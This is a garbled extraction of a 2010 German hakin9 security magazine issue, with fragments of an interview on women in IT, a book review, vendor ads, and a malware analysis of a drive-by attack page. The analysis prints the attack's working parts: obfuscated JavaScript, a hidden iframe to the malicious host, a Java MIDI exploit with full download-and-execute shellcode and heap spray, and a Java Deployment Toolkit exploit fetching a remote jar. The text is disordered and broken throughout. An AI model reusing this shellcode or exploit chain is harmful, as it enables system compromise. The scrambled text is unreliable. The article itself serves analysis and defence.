vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201012
FORTGESCHRITTENE
Version ein bestimmter Codeblock angesprungen wel-cher eine Schwachstelle in der JVM ausnutzt wodurch ein Jailbreak ermoumlglicht wird Urspruumlnglich sollen Java-Anwendungen in einer Art sicheren Sandbox laufen und keinen Schaden im Computer anrichten2 Diese Barrie-re ist in unserem Beispiel durchbrochen In dem Code-fragment unten (vgl Listing 4a 4b) betrifft die aus-genutzte Schwachstelle vor allem die Java-Versionen bis einschlieszliglich 160_16 Unter httpvreugdenhil-
researchnl201005java-midi-parse-vulnerabilitieskann jeder Interessierte detaillierte Informationen zur verwendeten Schwachstelle erhalten Ausgangspunkt ist ein Fehler in der Verarbeitung von URLs im einge-bauten Midiplayer von Java
Beim Ausnutzen der Schwachstelle wird der Shell-code ausgefuumlhrt welcher nun vollen Zugriff auf das System hat und Schadsoftware mitsamt Trojaner von der externen Quelle (URL) nachladen kann
Sollte der Benutzer eine aumlltere Java-Version installiert haben so wird eine andere Codepassage angesprun-gen die Schwachstellen aumllterer Java-Versionen aus-nutzt
Hier ist ein Java-Applet eingebettet welches beim Aufruf der Seite von der Java-Virtual-Machine ausge-fuumlhrt wird sofern diese im Browser installiert und akti-viert ist Ein weiterer verschleierter JavaScript-Code fin-det sich ebenfalls
Zunaumlchst analysieren wir das Java-Applet tmpdesjar In der Datei befinden sich drei Java-Klassen von denen eine namens devsAdgredY als Einsprungs-punkt fuumlr das Applet dient Mit einem Java-Decompiler kann man die Klassen welche momentan in Java-Byte-code vorliegen in leserlichen Java-Quelltext uumlberfuumlh-ren Dies entspricht nicht ganz dem originalem Quell-text kommt ihm aber recht nahe Wir benutzen dafuumlr den Decompiler von httpjavadecompilerfreefrSchaut man sich nun den Java-Quelltext an stellt man fest dass keine Obfuscation fuumlr Java wie zB das un-ter der GPL 2+ stehende ProGuard benutzt wurden Was zu erwarten gewesen waumlre um die Erkennung zu erschweren
Nach einer Verifikation der als Parameter uumlbergebe-nen URL httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1 wird abhaumlngig von der Java-
Listing 2 Weiterleitung an eine weitere Seite
function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) +
kpn8 -= (p3je + 1) j446
if (kpn8 lt 0)
kpn8 += j446
raiy(iyv2charAt(kpn8))
else
raiy(bo97)
documentwrite(bvgy)bvgy=
eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv
67y=2222))
documentwrite(ltmeta http-equiv=refresh
content=0url=httpnumerouno-
indiacomxhtml gt)
etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x
emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)
if (this_is == an_example)
do_something()
else
var a = b (c d) e[f]
PLEASE WAITING 4 SECONDS
ltmeta http-equiv=refresh content=4url=http
gt
ltiframe width=0 height=0 src=httparestyute
comsadhbdsa879321jbdasindex
phpgtltiframegt
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
